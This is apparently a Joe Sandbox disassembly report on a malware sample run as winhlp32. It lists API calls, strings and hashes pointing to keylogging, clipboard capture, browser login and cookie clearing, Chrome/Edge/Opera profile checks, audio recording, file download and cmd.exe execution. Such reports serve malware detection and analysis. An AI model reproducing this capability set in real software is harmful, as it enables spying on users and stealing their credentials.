                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                    • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                    • ShowWindow.USER32(00000009), ref: 00416C61
                                    • SetForegroundWindow.USER32 ref: 00416C6D
                                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                    • String ID: !D@
                                    • API String ID: 3446828153-604454484
                                    • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                    • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $cmd.exe$open
                                    • API String ID: 587946157-3896048727
                                    • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                    • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                    • API String ID: 3472027048-1236744412
                                    • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                    • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$ForegroundLength
                                    • String ID: [ $ ]
                                    • API String ID: 3309952895-93608704
                                    • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                    • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                    • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                    • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                    • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                    • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcess
                                    • String ID:
                                    • API String ID: 39102293-0
                                    • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                    • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID:
                                    • API String ID: 2633735394-0
                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                    • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                    • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                    • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                    • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-0
                                    • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                    • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                    • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                    • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                    • GetLastError.KERNEL32 ref: 0044B804
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                    • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                    • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                    • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                    • GetLastError.KERNEL32 ref: 0044B716
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                    • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                    • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                    • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32 ref: 00416640
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                    • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                    • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx$PkGNG
                                    • API String ID: 2568140703-1065776982
                                    • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                    • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                    • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                    • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$JD
                                    • API String ID: 1901932003-2234456777
                                    • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                    • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                    • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                    • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                    • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
